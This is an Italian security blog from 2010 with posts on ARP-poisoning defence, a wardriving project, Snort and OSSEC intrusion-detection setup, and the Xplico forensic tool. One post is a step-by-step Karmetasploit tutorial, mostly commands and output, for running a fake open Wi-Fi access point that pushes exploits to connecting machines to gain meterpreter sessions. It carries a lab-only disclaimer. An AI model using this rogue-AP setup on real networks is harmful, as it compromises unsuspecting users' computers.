lunedì 10 maggio 2010

ArpON

Arpon è un software sviluppato da un programmatore catanese, che rileva e blocca i tentativi di attacco di tipo arp poisoning, utilizzando due tipi di tecniche anti arp poisoning SARPI o "Static Arp Ispezione" e DARPI o "approccio dinamico Arp di controllo.Si può installare su ubuntu direttamente tramite repository, per maggiori informazioni sul suo utilizzo e del man dei vari comandi visitate il sito Arpon.



sabato 8 maggio 2010

OSRW

La community di Backtrack ha aperto ufficialmente il progetto Osservatorio Sicurezza delle Reti Wireless, il progetto consiste nel promuovere e informare gli utenti che utilizzano reti wireless dei rischi che corrono per una cattiva gestione della loro rete wifi, come per esempio lasciare la propria rete wifi open o con la crittografia wep. Potete partecipare al progetto inviando i risultati delle vostre sessioni di wardriving della propria città. Per maggiori informazioni visitate il sito italiano di backtrack OSRW.




martedì 6 aprile 2010

IDS Intrusion detection system

Ho parlato delle tecniche di attacco verso host e server, oggi parlo come difendersi da attacchi provenienti dalla rete utilizzando snort e ossec con web gui, sono dei intrusion detection system, cioè dei software che rilevano o anche bloccano molti attacchi che provengono da internet e scansioni con port scanner . Installiamo snort su ubuntu server da gestore pacchetti synaptics o su qualsiasi distro linux compilando i sorgenti seguendo questa guida Installare e configurare Snort, una volta installato snort dobbiamo configurarlo e caricare i rules opensource dal sito di emergingthreats, modifichiamo il file conf di snort da shell logati come root

sudo nano /etc/snort/snort.conf

modifichiamo la variabile var EXTERNAL_NET any togliendo any e mettendo !$HOME_NET, con questo comando snort rileva gli indirizzi ip esterni alla nostra rete LAN, dopo installiamo oinkmaster che ci permetterà di scaricare le rules dal sito di emergingthreats

sudo apt-get install oinkmaster

modifichiamo il suo file conf

sudo nano /etc/oinkmaster.conf

e inseriamo sotto a #url = http://www.snort.org/dl/rules/snortrules-snapshot-2_2.tar.gz commentandolo noi l'url di emergingthreats url =
http://www.emergingthreats.net/rules/emerging.rules.tar.gz
, salviamo e inseriamo in /etc/snort/snort.conf questo:

# Emergin rules
var SSH_PORTS 22
include $RULE_PATH/emerging-attack_response.rules
include $RULE_PATH/emerging-botcc.rules
include $RULE_PATH/emerging-compromised.rules
include $RULE_PATH/emerging-dos.rules
include $RULE_PATH/emerging-drop.rules
include $RULE_PATH/emerging-dshield.rules
include $RULE_PATH/emerging-exploit.rules
include $RULE_PATH/emerging-game.rules
include $RULE_PATH/emerging-inappropriate.rules
include $RULE_PATH/emerging-malware.rules
include $RULE_PATH/emerging-p2p.rules
include $RULE_PATH/emerging-policy.rules
include $RULE_PATH/emerging-rbn.rules
include $RULE_PATH/emerging.rules
include $RULE_PATH/emerging-scan.rules
include $RULE_PATH/emerging-virus.rules
include $RULE_PATH/emerging-voip.rules
include $RULE_PATH/emerging-web.rules
include $RULE_PATH/emerging-web_sql_injection.rules
# Fine emergin rules

scarichiamo le rules sulla cartella /etc/snort/rules con questo comando

/usr/sbin/oinkmaster -o /etc/snort/rules

bene non ci resta che riavviare snort con /etc/init.d/snort restart e proviamo se funziona effettuando qualche scansione DoS sul nostro web server, il log file di snort si trova in /var/log/snort chiamato "alert" ovviamente!
Se tutto va bene installiamo ossec insieme alla sua web gui, un'altro ottimo IDS che serve per analizzare in tempo reale tutti i files log di sistema compresi quelli di snort e apache2, ricerca di rootkit, monitoraggio e applicazione della policy, segnalazione di situazioni sospette o critiche tramite email ed è altamente personalizzabile.
Installiamo ossec seguendo le guide sul suo sito, scaricando e estrando i suoi files

root@ubuntu:~# wget http://www.ossec.net/files/ossec-hids-latest.tar.gz


root@ubuntu:~# tar -zxvf ossec-hids-*.tar.gz (or gunzip -d; tar -xvf)


root@ubuntu:~# cd ossec-hids-*


root@ubuntu:~# ./install.sh

ci chiederà quale versione installare Server, Agent o Local, se è per fare delle prove sulla vostra rete LAN vi consiglio d'installare la versione local, comunque la procedura di installazione è guidata e anche in italiano. Installazione ultimata avviamo ossec con questo comando

root@ubuntu:~# /var/ossec/bin/ossec-control start

se si avvia e funziona passiamo all'installazione della sua web gui, come per ossec scarichiamola, estraiamola e spostiamola in /var/www/

root@ubuntu:~# wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz

root@ubuntu:~# tar -zxvf ossec-wui-0.3.tar.gz

root@ubuntu:~# mv ossec-wui-0.3 /var/www/ossec-wui-0.3

passiamo all'installazione della web-gui

root@ubuntu:~# cd /var/www/ossec-wui-0.3

root@ubuntu:~# ./setup.sh

adesso aggiungiamo www-data sull'user di ossec su nano /etc/group/ cosi ossec:x:1001:www-data, diamo i permessi alla cartella /tmp che si trova in /var/www/ossec-wui-0.3 cosi

root@ubuntu:/var/www/ossec-wui-0.3# chmod 770 /tmp

root@ubuntu:/var/www/ossec-wui-0.3# chown www-data:www-data /tmp

infine modifichiamo il php.ini di PHP installato insieme con Apache2 sostituendo questi valori

max_execution_time = 180
max_input_time = 180
memory_limit = 30M

bene abbiamo finito, riavviamo apache2 e utiliziamo ossec con la web-gui, scrivendo nel nostro browser http://localhost/ossec-wui-0.3.



martedì 9 marzo 2010

Fake AP con Karmetasploit

Ci sono vari modi per creare un AP falso, che potrebbe essere utile per fare delle prove per testare le keys wep o wpa. Nel tool di Gerix-Wifi-Cracker c'è una opzione che permette di creare un AP falso impostando il tipo di crittografia e la password, ovviamente dovreste avere almeno due scheda wireless, una serve per creare l'AP l'altra per craccarlo. Potremo anche crearlo personalmente seguendo questa guida presa dal forum italiano di remote-exploit Come creare un AP falso con tua scheda wifi, vediamo ora come crearlo con karmetasploit un tool sviluppato dallo stesso team di metasploit, karma creerà un fake AP senza password quindi open che chiunque potrà collegarsi, quando un pc si collegherà all'AP karma invierà una serie di exploits nel pc vittima per ottenere una sessione di meterpreter. Passiamo ora all'installazione e configurazione di karma!

Scarichiamo karma dal sito di metasploit

root@morfes:/opt/metasploit3/msf3# wget "http://metasploit.com/users/hdm/tools/karma.rc"
--2009-05-04 18:43:26-- http://metasploit.com/users/hdm/tools/karma.rc
Resolving metasploit.com... 66.240.213.81
Connecting to metasploit.com|66.240.213.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1088 (1.1K) [text/plain]
Saving to: `karma.rc'

100%[============================================================================>] 1,088 --.-K/s in 0s

(88.7 MB/s) - `karma.rc' saved [1088/1088]



modifichiamo il file dhcp.conf inserendo questi comandi, ah prima facciamo un backup del file

root@morfes:~# nano /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


installiamo dei requisiti che servono a karma

root@morfes:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions. This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...


mettiamo in modalità monitor con airmon-ng una delle nostre schede wifi e avviamo airbase-ng per creare l'AP falso

root@morfes:~# airmon-ng


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]



root@morfes:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)



root@morfes:~# airbase-ng -P -C 30 -e "Morfes" -v mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on ath1 to 1800
22:52:25 Access Point with BSSID 00:1A:4D:49:0B:26 started.


impostiamo l'ip per la nostra nuova interfaccia di rete at0 e attiviamo il DHCP Server

root@morfes:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@morfes:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@morfes:~# ps aux | grep dhcpd
dhcpd 6490 0.0 0.1 3812 1840 ? Ss 22:55 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 6493 0.0 0.0 3232 788 pts/0 S+ 22:55 0:00 grep dhcpd


e infine avviamo karma

root@morfes:/opt/metasploit3/msf3# ./msfconsole -r karma.rc


Vi ricordo che questo è un tutorial dimostrativo, tutto ciò deve essere fatto nella vostra rete lan! Vi ricordo inoltre che entrare in una rete wifi altrui anche se open è illegale, anche perchè come dimostrato nell'articolo se entrate in una rete wifi open creata da qualche cracker potete diventare delle possibile vittime! :)




sabato 6 marzo 2010

Xplico

Xplico ora è anche su backtrack! Xplico è un Network Forensic Analysis Tool (NFAT), ovvero un software che riesce a ricostruire i contenuti dei pacchetti catturati tramite l'utilizzo di packet sniffer come Wireshark e Tcpdump o anche con Xplico stesso, infatti Xplico oltre che ricostruire i pacchetti pcap ha pure la funzione di sniffer. Xplico riesce a ricostruire tutti i dati trasportati dai protocolli come HTTP, IMAP, POP, SMTP, SIP "voip", FTP e TELNET, anche ricostruire le email scambiate e le chat come facebook. Il software è sviluppato da Gianluca Costa e Andrea de Franceschi, rilasciato sotto licenza Open Source ed è installabile solo su Linux. Per avere maggiori informazioni su come installarlo su altre distro linux visitate il wiki del sito ufficiale di Xplico. Tramite il mio video vi faccio vedere come installarlo su backtrack e come funziona con un semplice esempio di sniffer del protocollo HTTP tramite la sua interfaccia web.